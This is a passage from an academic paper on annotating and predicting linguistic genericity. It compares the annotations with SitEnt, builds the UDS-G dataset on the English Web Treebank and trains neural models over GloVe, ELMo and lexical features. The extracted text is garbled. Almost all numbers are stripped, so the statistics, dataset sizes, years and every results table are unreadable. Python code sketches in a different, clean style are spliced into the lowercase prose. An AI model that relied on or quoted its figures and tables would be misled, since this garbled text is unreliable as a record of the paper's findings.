tations assigned under our multi-label framework to those assigned under a framework that recog- nizes such multi-class distinctions. we choose the the sitent framework for this comparison, because we use the product of annotator confidences because it is large when both annotators have high confidence and small when either annotator has low confidence and always remains between (lowest confidence) and (highest confidence). clause type p r f κmod κann eventive . . . . . stative . . . . . habitual . . . . . generic . . . . . table : predictability of standard ontology using our property set in a kernelized support vector classifier. it assumes a categorical distinction between generic, habitual (their generalizing), episodic (their eventive), and stative clauses (friedrich and palmer, a,b; friedrich et al., ; friedrich and pinkal, b,a; friedrich et al., ). sitent is also a useful comparison because it was constructed by highly trained annotators who had access to the entire document containing the clause being annotated, thus allowing us to assess both how much it matters that we use only very lightly trained annotators and do not provide document context. predicate and argument extraction for each of generic, habitual, stative, and eventive, we randomly sample clauses from sitent such that (i) that clause’s gold annotation has that category; and (ii) all sitent annotators agreed on that annotation. 
we annotate the mainrefer- ent of these clauses (as defined by sitent) in our argument protocol and the mainverb in our predicate protocol, providing annotators only the sentence containing the clause. annotators annotators were recruited from amazon mechanical turk to annotate arguments, and annotators were recruited to annotate predicates—both in batches of , with each predicate and argument annotated by annotators. annotation normalization as noted in § , different annotators use the confidence scale dif- ferently and have different biases for responding true or false on different properties (see table ). to adjust for these biases, we construct a nor- malized score for each predicate and argument using mixed effects logistic regressions. these mixed effects models all had (i) a hinge loss with margin set to the normalized confidence rating; (ii) fixed effects for property (particular, sitent additionally assumes three other classes, con- trasting with the four above: imperative, question, and report. we ignore clauses labeled with these categories. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april kind, and abstract for arguments; particular, hypothetical, and dynamic for predicates) token, and their interaction; and (iii) by-annotator ran- dom intercepts and random slopes for property with diagonal covariance matrices. the rationale behind (i) is that true should be associated with positive values; false should be associated with negative values; and the confidence rating should control how far from zero the normalized rating is, adjusting for the biases of annotators that responded to a particular item. the resulting re- sponse scale is analogous to current approaches to event factuality annotation (lee et al., ; stanovsky et al., ; rudinger et al., ). we obtain a normalized score from these models by setting the best linear unbiased pre- dictors for the by-annotator random effects to zero and using the best linear unbiased estimators for the fixed effects to obtain a real-valued label for each token on each property. this procedure amounts to estimating a label for each property and each token based on the ‘‘average annotator.’’ quantitative comparison to compare our anno- tations to the gold situation entity types from sitent, we train a support vector classifier with a radial basis function kernel to predict the situation entity type of each clause on the basis of the normalized argument property annotations for that clause’s mainreferent and the nor- malized predicate property annotations for that clause’s mainverb. the hyperparameters for this support vector classifier were selected using exhaustive grid search over the regularization parameter λ ∈ { , , , } and bandwidth σ ∈ { − , − , − , − } in a -fold cross- validation (cv). this -fold cv was nested within a -fold cv, from which we calculate metrics. table reports the precision, recall, and f-score computed using the held-out set in each fold of the -fold cv. for purposes of comparison, it also gives the fleiss’ κ reported by friedrich et al. ( ) for each property (κann) as well as cohen’s κ between our model predictions on the held-out folds and the gold sitent annotations (κmod). one way to think about κmod is that it tells us what agreement we would expect if we used our model as an annotator instead of highly trained humans. we see that our model’s agreement (κmod) tracks interannotator agreement (κann) surprisingly well. 
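For concreteness, a possible scikit-learn rendering of the nested cross-validation described above is sketched below. scikit-learn parameterizes the classifier by C (an inverse regularization strength) and gamma (the RBF bandwidth) rather than by lambda and sigma directly, and the fold counts, grid values, and data in this sketch are placeholders, since the exact settings are elided in the text.

```python
import numpy as np
from sklearn.model_selection import GridSearchCV, cross_val_predict
from sklearn.svm import SVC

# X: normalized property scores for each clause's main referent and main verb
# (six columns in total); y: gold SitEnt clause types. Both are random stand-ins.
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 6))
y = rng.choice(["eventive", "stative", "habitual", "generic"], size=200)

# Inner CV selects hyperparameters over an illustrative grid.
inner = GridSearchCV(SVC(kernel="rbf"),
                     param_grid={"C": [0.1, 1, 10, 100],
                                 "gamma": [1e-3, 1e-2, 1e-1, 1]},
                     cv=5)

# Outer CV yields held-out predictions, from which precision, recall, F, and
# Cohen's kappa against the gold labels can be computed.
preds = cross_val_predict(inner, X, y, cv=5)
print((preds == y).mean())
```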
indeed, in some cases, such as for generic, our model’s agreement is within a few points of figure : mean property value for each clause type. interannotator agreement. this pattern is sur- prising, because our model is based on annota- tions by very lightly trained annotators who have access to very limited context compared with the annotators of sitent, who receive the entire doc- ument in which a clause is found. indeed, our model has access to even less context than it could otherwise have on the basis of our framework, since we only annotate one of the potentially many arguments occurring in a clause; thus, the metrics in table are likely somewhat conser- vative. this pattern may further suggest that, although having extra context for annotating com- plex semantic phenomena is always preferable, we still capture useful information by annotating only isolated sentences. qualitative comparison figure shows the mean normalized value for each property in our framework broken out by clause type. as ex- pected, we see that episodics tend to have particular-referring arguments and predicates, whereas generics tend to have kind-referring arguments and non-particular predicates. also as expected, episodics and habituals tend to refer to situations that are more dynamic than statives and generics. but although it makes sense that generics would be, on average, near zero for dynamicity—since generics can be about both dynamic and non-dynamic situations—it is less clear why statives are not more negative. this pattern may arise in some way from the fact that downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april there is relatively lower agreement on dynamicity, as noted in § . bulk annotation we use our annotation framework to collect anno- tations of predicates and arguments on ud-ewt using the predpatt system—thus yielding the uni- versal decompositional semantics–genericity (uds-g) dataset. using ud-ewt in conjunction with predpatt has two main advantages over other similar corpora: (i) ud-ewt contains text from multiple genres—not just newswire—with gold standard universal dependency parses; and (ii) there are now a wide variety of other semantic annotations on top of ud-ewt that use the predpatt standard (white et al., ; rudinger et al., ; vashishtha et al., ). predicate and argument extraction predpatt identifies , predicates and , arguments of those predicates from , sentences. based on analysis of the data from our validation study (§ ) and other pilot experiments (not reported here), we developed a set of heuristics for filtering certain tokens that predpatt identifies as predicates and arguments, either because we found that there was little variability in the label assigned to particular subsets of tokens—for example, pro- nominal arguments (such as i, we, he, she, etc.) are almost always labeled particular, non-kind, and non-abstract (with the exception of you and they, which can be kind-referring)—or because it is not generally possible to answer questions about those tokens (e.g., adverbial predicates are excluded). based on these filtering heuristics, we retain , arguments and , predicates for annotation. table compares these numbers against the resources described in § . annotators we recruited annotators from amazon mechanical turk to annotate arguments, and annotators were recruited to annotate predicates. 
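A toy version of the pronoun-filtering heuristic described above is sketched below; the real pipeline operates on PredPatt output over UD-EWT, so the POS set, lemma list, and decision rule here are illustrative only.

```python
# Sketch of a filtering heuristic in the spirit of the one described above:
# most pronominal arguments receive a near-deterministic label, but "you" and
# "they" (and their reflexives) can be kind-referring, so they are retained.
KIND_CAPABLE_PRONOUNS = {"you", "they", "yourself", "themselves"}
ARGUMENT_POS = {"DET", "NUM", "NOUN", "PROPN", "PRON"}

def keep_argument(lemma: str, upos: str) -> bool:
    """Return True if an argument root should be sent to annotators."""
    if upos == "PRON":
        return lemma.lower() in KIND_CAPABLE_PRONOUNS
    return upos in ARGUMENT_POS

print(keep_argument("she", "PRON"),   # filtered
      keep_argument("you", "PRON"),   # kept
      keep_argument("dog", "NOUN"))   # kept
```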
arguments and predicates in the ud- ewt validation and test sets were annotated by three annotators each; and those in the ud- ewt train set were annotated by one each. all annotations were performed in batches of . annotation normalization we use the anno- tation normalization procedure described in § , fit separately to our train and development splits, on the one hand, and our test split, on the other. corpus level scheme size ace- np multi-class , ace- ecb+ arg. multi-class , pred. multi-class , cfd np multi-class , matthew et al clause multi-class , arrau np multi-class , sitent topic multi-class , clause multi-class red arg. multi-class , pred. multi-class , uds-g arg. multi-label , pred. multi-label , table : survey of genericity annotated corpora for english, including our new corpus (in bold). exploratory analysis before presenting models for predicting our prop- erties, we conduct an exploratory analysis to dem- onstrate that the properties of the dataset relate to other token- and type-level semantic properties in intuitive ways. figure plots the normalized ratings for the argument (left) and predicate (right) protocols. each point corresponds to a token and the density plots visualize the number of points in a region. arguments we see that arguments have a slight tendency (pearson correlation ρ=− . ) to refer to either a kind or a particular—for example, place in ( ) falls in the lower right quadrant (particular- referring) and transportation in ( ) falls in the upper left quadrant (kind-referring)—though there are a not insignificant number of arguments that refer to something that is both—for example, registration in ( ) falls in the upper right quadrant. ( ) i think this place is probably really great especially judging by the reviews on here. ( ) what made it perfect was that they offered transportation so that[...] ( ) some places do the registration right at the hospital[...] we also see that there is a slight tendency for arguments that are neither particular-referring (ρ = − . ) nor kind-referring (ρ = − . ) to be abstract-referring—for example, power in ( ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : distribution of normalized annotations in argument (left) and predicate (right) protocols. falls in the lower left quadrant (only abstract- referring)—but that there are some arguments that refer to abstract particulars and some that refer to abstract kinds—for example, both reputation ( ) and argument ( ) are abstract, but reputation falls in the lower right quadrant, while argument falls in the upper left. ( ) power be where power lies. ( ) meanwhile, his reputation seems to be improving, although bangs noted a ‘‘pretty interesting social dynamic.’’ ( ) the pew researchers tried to transcend the economic argument. predicates we see that there is effectively no tendency (ρ = . ) for predicates that refer to particular situations to refer to dynamic events— for example, faxed in ( ) falls in the upper right quadrant (particular- and dynamic-referring), while available in ( ) falls in the lower right quadrant (particular- and non-dynamic-referring). ( ) i have faxed to you the form of bond[...] ( ) is gare montparnasse storage still available? but we do see that there is a slight tendency (ρ = − . ) for predicates that are hypothetical- referring not to be particular-referring—for ex- ample, knows in ( a) and do in ( b) are hypotheticals in the lower left. ( ) a. 
who knows what the future might hold, and it might be expensive? b. i have tryed to give him water but he wont take it...what should i do? models we consider two forms of predicate and argument representations to predict the three attributes in our framework: hand-engineered features and learned features. for both, we contrast both type-level information and token-level information. hand-engineered features we consider five sets of type-level hand-engineered features. . concreteness concreteness ratings for root argument lemmas in the argument protocol from the concreteness database (brysbaert et al., ) and the mean, maximum, and minimum concreteness rating of a predicate’s arguments in the predicate protocol. . eventivity eventivity and stativity ratings for the root predicate lemma in the predicate protocol and the predicate head of the root argument in the argument protocol from the lcs database (dorr, ). . verbnet verb classes from verbnet (schuler, ) for root predicate lemmas. . framenet frames evoked by root predicate lemmas in the predicate protocol and for both downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the root argument lemma and its predicate head in the argument protocol from framenet (baker et al., ). . wordnet the union of wordnet (fellbaum, ) supersenses (ciaramita and johnson, ) for all wordnet senses the root argument or predicate lemmas can have. and we consider two sets of token-level hand- engineered features. . syntactic features pos tags, ud morpho- logical features, and governing dependencies were extracted using predpatt for the predi- cate/argument root and all of its dependents. . lexical features function words (determin- ers, modals, auxiliaries) in the dependents of the arguments and predicates. learned features for our type-level learned features, we use the b uncased glove embed- dings for the root of the annotated predicate or argument (pennington et al., ). for our token- level learned features, we use , -dimensional elmo embeddings (peters et al., ). to obtain the latter, the ud-ewt sentences are passed as input to the elmo three-layered bilm, and we extract the output of all three hidden layers for the root of the annotated predicates and arguments, giving us , -dimensional vectors for each. labeling models for each protocol, we predict the three normalized properties corresponding to the annotated token(s) using different subsets of the above features. the feature representation is used as the input to a multilayer perceptron with relu nonlinearity and l loss. the number of hidden layers and their sizes are hyperparameters that we tune on the development set. implementation for all experiments, we use stochastic gradient descent to train the multilayer perceptron parameters with the adam optimizer (kingma and ba, ), using the default learning rate in pytorch ( − ). we performed ablation experiments on the four major classes of features discussed above. hyperparameters for each of the ablation ex- periments, we ran a hyperparameter grid search over hidden layer sizes (one or two hidden layers with sizes h , h ∈ { , , , , }; h at most half of h ), l regularization penalty l ∈ { , − , − , − } , and the dropout probability d ∈ { . , . , . , . , . }. development for all models, we train for at most epochs with early stopping. 
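A minimal PyTorch sketch of the labeling model and training regime described above follows; the early-stopping rule spelled out in the next paragraph is implemented inline. All dimensions, the epoch cap, and the data are placeholders, full-batch updates stand in for minibatch training, and the dropout and L2 settings explored in the grid search are omitted for brevity.

```python
import copy
import torch
import torch.nn as nn

# Placeholder dimensions: e.g., a 1024-d contextual embedding mapped through a
# two-hidden-layer MLP to the three properties of one protocol.
model = nn.Sequential(nn.Linear(1024, 512), nn.ReLU(),
                      nn.Linear(512, 256), nn.ReLU(),
                      nn.Linear(256, 3))
loss_fn = nn.L1Loss()
optim = torch.optim.Adam(model.parameters())  # PyTorch's Adam defaults to lr=1e-3

# Random stand-ins for train/dev features and normalized property scores.
x_tr, y_tr = torch.randn(512, 1024), torch.randn(512, 3)
x_dv, y_dv = torch.randn(128, 1024), torch.randn(128, 3)

best_state, prev_dev = copy.deepcopy(model.state_dict()), float("inf")
for epoch in range(20):                       # "at most N epochs"; N is a placeholder
    model.train()
    optim.zero_grad()
    loss_fn(model(x_tr), y_tr).backward()
    optim.step()
    model.eval()
    with torch.no_grad():
        dev = loss_fn(model(x_dv), y_dv).item()
    if dev > prev_dev:                        # dev loss increased: stop and keep
        model.load_state_dict(best_state)     # the previous epoch's parameters
        break
    best_state, prev_dev = copy.deepcopy(model.state_dict()), dev
```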
at the end of each epoch, the l loss is calculated on the development set, and if it is higher than the pre- vious epoch, we stop training, saving the param- eter values from the previous epoch. evaluation consonant with work in event fac- tuality prediction, we report pearson correlation (ρ) and proportion of mean absolute error (mae) explained by the model, which we refer to as r on analogy with the variance explained r = ρ . r = − maepmodel maepbaseline where maepbaseline is always guessing the median for property p. we calculate r across properties (wr ) by taking the mean r weighted by the mae for each property. these metrics together are useful, because ρ tells us how similar the predictions are to the true values, ignoring scale, and r tells us how close the predictions are to the true values, after accounting for variability in the data. we focus mainly on differences in relative performance among our models, but for comparison, state- of-the-art event factuality prediction systems obtain ρ ≈ . and r ≈ . for predicting event factuality on the predicates we annotate (rudinger et al., ). results table contains the results on the test set for both the argument (top) and predicate (bottom) protocols. we see that (i) our models are generally better able to predict referential properties of arguments than those of predicates; (ii) for both predicates and arguments, contextual learned repre- sentations contain most of the relevant information for both arguments and predicates, though the addition of hand-engineered features can give a slight performance boost, particularly for the predicate properties; and (iii) the proportion of absolute error explained is significantly lower than what we might expect from the variance explained implied by the correlations. we discuss (i) and (ii) here, deferring discussion of (iii) to § . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april feature sets is.particular is.kind is.abstract all type token glove elmo ρ r ρ r ρ r wr a r g u m e n t + − − − . . . . . . . − + − − . . . . . . . − − + − . . . . . . . − − − + . . . . . . . + + − − . . . . . . . − + − + . . . . . . . + + − + . . . . . . . + + + + . . . . . . . is.particular is.hypothetical is.dynamic p r e d ic a t e + − − − . . . . . . . − + − − . . . . . . . − − + − . . . . . . . − − − + . . . . . . . − − + + . . . . . . . + + − − . . . . . . . − + − + . . . . . . . + − − + . . . . . . . + + + + . . . . . . . table : correlation (ρ) and mae explained (r ) on test split for argument (top) and predicate (bottom) protocols. bolded numbers give the best result in the column; the models highlighted in blue are the ones analyzed in § . argument properties while type-level hand- engineered and learned features perform relatively poorly for properties such as is.particular and is.kind for arguments, they are able to predict is.abstract relatively well compared to the models with all features. the converse of this also holds: token-level hand-engineered features are better able to predict is.particular and is.kind, but perform relatively poorly on their own for is.abstract. this seems likely to be a product of abstract reference being fairly strongly associated with particular lexical items, while most arguments can refer to particulars and kinds (and which they refer to is context-dependent). 
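Returning briefly to the evaluation metrics defined above, both can be computed in a few lines of numpy; the weighted variant below averages per-property R1 values using each property's baseline MAE as the weight, which is one reading of the weighting described in the text.

```python
import numpy as np

def r1_score(y_true, y_pred):
    """Proportion of mean absolute error explained, relative to always
    guessing the median of the true scores (the baseline described above)."""
    y_true, y_pred = np.asarray(y_true), np.asarray(y_pred)
    mae_model = np.mean(np.abs(y_true - y_pred))
    mae_base = np.mean(np.abs(y_true - np.median(y_true)))
    return 1.0 - mae_model / mae_base

def weighted_r1(y_true_by_prop, y_pred_by_prop):
    """Mean R1 across properties, weighted by each property's baseline MAE
    (an assumption about the exact weighting, which the text leaves implicit)."""
    r1s, weights = [], []
    for yt, yp in zip(y_true_by_prop, y_pred_by_prop):
        yt = np.asarray(yt)
        r1s.append(r1_score(yt, yp))
        weights.append(np.mean(np.abs(yt - np.median(yt))))
    return float(np.average(r1s, weights=weights))

# Toy check: a correlated prediction and a baseline-level prediction.
rng = np.random.default_rng(0)
y = rng.normal(size=500)
yhat = 0.8 * y + rng.normal(scale=0.3, size=500)
rho = np.corrcoef(y, yhat)[0, 1]
print(rho, r1_score(y, yhat))
print(weighted_r1([y, y], [yhat, np.full(500, np.median(y))]))
```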
and in light of the relatively good performance of contextual learned features alone, it suggests that these contextual learned features—in contrast to the hand-engineered token-level features—are able to use this information coming from the lexical item. interestingly, however, the models with both contextual learned features (elmo) and hand- engineered token-level features perform slightly better than those without the hand-engineered features across the board, suggesting that there is some (small) amount of contextual information relevant to generalization that the contextual learned features are missing. this performance boost may be diminished by improved contextual encoders, such as bert (devlin et al., ). predicate properties we see a pattern similar to the one observed for the argument properties mirrored in the predicate properties: whereas type-level hand-engineered and learned features perform relatively poorly for properties such as is.particular and is.hypothetical, they are able to predict is.dynamic relatively well compared with the models with all features. the converse of this also holds: token-level hand-engineered features are better able to predict is.particular and is.hypothetical, but perform relatively poorly on their own for is.dynamic. one caveat here is that, unlike for is.abstract, type-level learned features (glove) alone perform quite poorly for is.dynamic, and the difference between the models with only type-level hand- engineered features and the ones with only token-level hand-engineered features is less stark for is.dynamic than for is.abstract. this may suggest that, though is.dynamic is relatively con- strained by the lexical item, it may be more contextually determined than is.abstract. another downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : true (normalized) property values for argument (top) and predicate (bottom) protocols in the development set plotted against values predicted by models highlighted in blue in table . major difference between the argument prop- erties and the predicate properties is that is.particular is much more difficult to predict than is.hypothetical. this contrasts with is.particular for arguments, which is easier to predict than is.kind. analysis figure plots the true (normalized) property val- ues for the argument (top) and predicate (bottom) protocols from the development set against the values predicted by the models highlighted in blue in table . points are colored by the part-of-speech of the argument or predicate root. we see two overarching patterns. first, our models are generally reluctant to predict values outside the [− , ] range, despite the fact that there are not an insignificant number of true values outside this range. this behavior likely contributes to the difference we saw between the ρ and r metrics, wherein r was generally worse than we would expect from ρ. this pattern is starkest for is.particular in the predicate protocol, where predictions are nearly all constrained to [ , ]. second, the model appears to be heavily reliant on part-of-speech information—or some semantic information related to part-of-speech—for making predictions. 
this behavior can be seen in the fact that, though common noun-rooted arguments get relatively variable predictions, pronoun- and proper noun-rooted arguments are almost always predicted to be particular, non-kind, non-abstract; and though verb-rooted predicates also get rela- tively variable predictions, common noun-, adjective-, and proper noun-rooted predicates are almost always predicted to be non-dynamic. argument protocol proper nouns tend to refer to particular, non-kind, non-abstract entities, but they can be kind-referring, which our models miss: iphone in ( ) and marines in ( ) were predicted to have low kind score and high particular score, while annotators label these arguments as non-particular and kind-referring. ( ) the us marines took most of fallujah wednesday, but still face[...] ( ) i’m writing an essay...and i need to know if the iphone was the first smart phone. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april this similarly holds for pronouns. as men- tioned in § , we filtered out several pronominal arguments, but certain pronouns—like you, they, yourself, themselves—were not filtered because they can have both particular- and kind-referring uses. our models fail to capture instances where pronouns are labeled kind-referring (e.g., you in ( ) and ( )) consistently predicting low is.kind scores, likely because they are rare in our data. ( ) i like hayes street grill....another plus, it’s right by civic center, so you can take a romantic walk around the opera house, city hall, symphony auditorium[...] ( ) what would happen if you flew the flag of south vietnam in modern day vietnam? this behavior is not seen with common nouns: the model correctly predicts common nouns in certain contexts as non-particular, non-abstract, and kind-referring (e.g., food in ( ) and men in ( )). ( ) kitchen puts out good food[...] ( ) just saying most men suck! predicate protocol as in the argument protocol, general trends associated with part-of-speech are exaggerated by the model. we noted in § that annotators tend to annotate hypothetical predicates as non-particular and vice-versa (ρ= − . ), but the model’s predictions are anti-correlated to a much greater extent (ρ = − . ). for example, annotators are more willing to say a predicate can refer to particular, hypothetical situations ( ) or a non-particular, non-hypothetical situation ( ). ( ) read the entire article[...] ( ) it s illegal to sell stolen property, even if you don’t know its stolen. the model also had a bias towards partic- ular predicates referring to dynamic predicates (ρ = . )—a correlation not present among annotators. for instance, is closed in ( ) was annotated as particular but non-dynamic but predicted by the model to be particular and dy- namic; and helped in ( ) was annotated as non- particular and dynamic, but the model predicted particular and dynamic. ( ) library is closed. ( ) i have a new born daughter and she helped me with a lot. conclusion we have proposed a novel semantic framework for modeling linguistic expressions of generalization as combinations of simple, real-valued referential properties of predicates and their arguments. we used this framework to construct a dataset covering the entirety of the universal depen- dencies english web treebank and probed the ability of both hand-engineered and learned type- and token-level features to predict the annotations in this dataset. 
acknowledgments we would like to thank three anonymous re- viewers and chris potts for useful comments on this paper as well as scott grimm and the facts.lab at the university of rochester for use- ful comments on the framework and protocol design. this research was supported by the univer- sity of rochester, jhu hltcoe, and darpa aida. the u.s. government is authorized to re- produce and distribute reprints for governmental purposes. the views and conclusions contained in this publication are those of the authors and should not be interpreted as representing official policies or endorsements of darpa or the u.s. government. references lasha abzianidze and johan bos. . towards universal semantic tagging. in iwcs , th international conference on computational semantics, short papers. alan agresti. . categorical data analysis, . john wiley & sons. r.h. baayen. . analyzing linguistic data: a practical introduction to statistics using r. cambridge university press. collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet proj- ect. in proceedings of the th annual meeting of the association for computational linguistics and th international conference on computational linguistics - volume , pages – , montreal. lisa bauer, yicheng wang, and mohit bansal. . commonsense for generative multi- hop question answering tasks. in proceedings downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april of the conference on empirical methods in natural language processing, pages – , brussels. cosmin adrian bejan and sanda harabagiu. . unsupervised event coreference resolution with rich linguistic features. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala. ann bies, justin mott, colin warner, and seth kulick. . english web treebank ldc t . linguistic data consortium, philadelphia, pa. marc brysbaert, amy beth warriner, and victor kuperman. . concreteness ratings for thousand generally known english word lemmas. behavior research methods, ( ): – . greg carlson, rachel sussman, natalie klein, and michael tanenhaus. . weak definite noun phrases. in proceedings of nels , pages – , amherst, ma. greg n. carlson. . reference to kinds in english. ph.d. thesis, university of massachusetts, amherst. gregory carlson. . genericity, in (maienborn et al., ), – . gregory n. carlson and francis jeffry pelletier. . the generic book, the university of chicago press. massimiliano ciaramita and mark johnson. . supersense tagging of unknown nouns in wordnet. in proceedings of the con- ference on empirical methods in natural language processing, pages – . agata cybulska and piek vossen. a. guidelines for ecb+ annotation of events and their coreference. technical report nwr- - , vu university amsterdam. agata cybulska and piek vossen. b. using a sledgehammer to crack a nut? lexical diversity and event coreference resolution. in proceedings of the ninth international con- ference on language resources and evaluation (lrec’ ), reykjavik. marie-catherine de marneffe, timothy dozat, natalia silveira, katri haverinen, filip ginter, joakim nivre, and christopher d. manning. . universal stanford dependencies: a cross-linguistic typology. in proceedings of the ninth international conference on language resources and evaluation (lrec’ ), pages – , reykjavik. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. george r. doddington, alexis mitchell, mark a. przybocki, lance a. ramshaw, stephanie strassel, and ralph m. weischedel. . the automatic content extraction (ace) program—tasks, data, and evaluation. in pro- ceedings of the fourth international con- ference on language resources and evaluation (lrec’ ), lisbon. bonnie j. dorr. . lcs database. university of maryland. david dowty. . thematic proto-roles and argument selection. language, ( ): – . christiane fellbaum. . wordnet: an electronic lexical database, mit press, cambridge, ma. annemarie friedrich and alexis palmer. a. automatic prediction of aspectual class of verbs in context. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, md. annemarie friedrich and alexis palmer. b. situation entity annotation. in proceedings of law viii - the th linguistic annotation workshop, pages – , dublin. annemarie friedrich, alexis palmer, melissa peate sørensen, and manfred pinkal. . annotating genericity: a survey, a scheme, and a corpus. in proceedings of the th linguistic annotation workshop, pages – , denver, co. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april annemarie friedrich, alexis palmer, and manfred pinkal. . situation entity types: automatic classification of clause-level aspect. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , berlin. annemarie friedrich and manfred pinkal. a. automatic recognition of habituals: a three- way classification of clausal aspect. in pro- ceedings of the conference on empirical methods in natural language processing, pages – , lisbon. annemarie friedrich and manfred pinkal. b. discourse-sensitive automatic identification of generic expressions. in proceedings of the rd annual meeting of the association for compu- tational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing. andrew gelman and jennifer hill. . data analysis using regression and multilevel- hierarchical models. cambridge university press, new york city. scott grimm. . individuating the abstract. in proceedings of sinn und bedeutung , pages – , bayonne and vitoria-gasteiz. scott grimm. . crime investigations: the countability profile of a delinquent noun. baltic international yearbook of cognition, logic and communication, . doi: . / - . . scott grimm. . grammatical number and the scale of individuation. language, ( ): – . jerry r. hobbs, william croft, todd davies, douglas edwards, and kenneth laws, . commonsense metaphysics and lexical seman- tics. computational linguistics, ( - ): – . nancy ide, christiane fellbaum, collin baker, and rebecca passonneau. . the manually annotated sub-corpus: a community resource for and by the people. in proceedings of the acl conference short papers, pages – , uppsala. diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of rd international conference on learning representations (iclr ), san diego, ca. heeyoung lee, marta recasens, angel chang, mihai surdeanu, and dan jurafsky. . joint entity and event coreference resolution across documents. 
in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , jeju island. kenton lee, yoav artzi, yejin choi, and luke zettlemoyer. . event detection and factuality assessment with non-expert supervi- sion. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon. sarah-jane leslie and adam lerner. . generic generalizations, edward n. zalta, editor, the stanford encyclopedia of phil- osophy, winter edition. metaphysics research lab, stanford university. annie louis and ani nenkova. . automatic identification of general and specific sentences by leveraging discourse annotations. in proceed- ings of th international joint conference on natural language processing, pages – , chiang mai. claudia maienborn, klaus von heusinger, and paul portner, editors. . semantics: an international handbook of natural language meaning, volume . mouton de gruyter, berlin. thomas a. mathew. . supervised catego- rization of habitual versus episodic sentences. master’s thesis, georgetown university. john mccarthy. . programs with common sense, rle and mit computation center. john mccarthy. . circumscription—a form of nonmonotonic reasoning. artificial intelli- gence, ( – ): – . john mccarthy. . applications of cir- cumscription to formalizing common sense knowledge. artificial intelligence, : – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april marvin minsky. . a framework for represent- ing knowledge. mit-ai laboratory memo . alexis mitchell, stephanie strassel, mark przybocki, j. k. davis, george doddington, ralph grishman, adam meyers, ada brunstein, lisa ferro, and beth sundheim. . ace- version . ldc t . linguistic data consortium, philadelphia, pa. joakim nivre, zeljko agic, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel ballesteros, john bauer, kepa bengoetxea, riyaz ahmad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie- catherine de marneffe, arantza diaz de ilarraza, kaja dobrovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, berta gonzales, bruno guillaume, jan hajič, dag haug, radu ion, elena irimia, anders johannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martı́nez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simonetta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel- augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolfgang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, larraitz uria, viktor varga, veronika vincze, zdeněk žabokrtský, daniel zeman, hanzhi zhu. . universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics (úfal), faculty of mathematics and physics, charles university. tim o’gorman, kristin wright-bettner, and martha palmer. . 
richer event description: integrating event coreference with temporal, causal and bridging annotation. in proceedings of the nd workshop on computing news storylines (cns ), pages – , austin, tx. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha. matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep con- textualized word representations. in proceed- ings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. massimo poesio. . discourse annotation and semantic annotation in the gnome corpus. in proceedings of the acl workshop on discourse annotation, pages – , barcelona. massimo poesio, yulia grishina, varada kolhatkar, nafise moosavi, ina roesiger, adam roussel, fabian simonjetz, alexandra uma, olga uryupina, juntao yu, and heike zinsmeister. . anaphora resolution with the arrau corpus. in proceedings of the first workshop on computational models of reference, anaphora and coreference, pages – , new orleans, la. james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. . the timebank corpus. in proceedings of corpus linguistics, pages – , lancaster. drew reisinger, rachel rudinger, francis ferraro, craig harman, kyle rawlins, and benjamin van durme. . semantic proto- roles. transactions of the association for computational linguistics, : – . nils reiter and anette frank. . identifying generic noun phrases. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april raymond reiter. . nonmonotonic reasoning, in j. f. traub, n. j. nilsson, and b. j. grosz, editors, annual review of computer science, volume , pages – . annual reviews inc. rachel rudinger, aaron steven white, and benjamin van durme. . neural models of factuality. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language 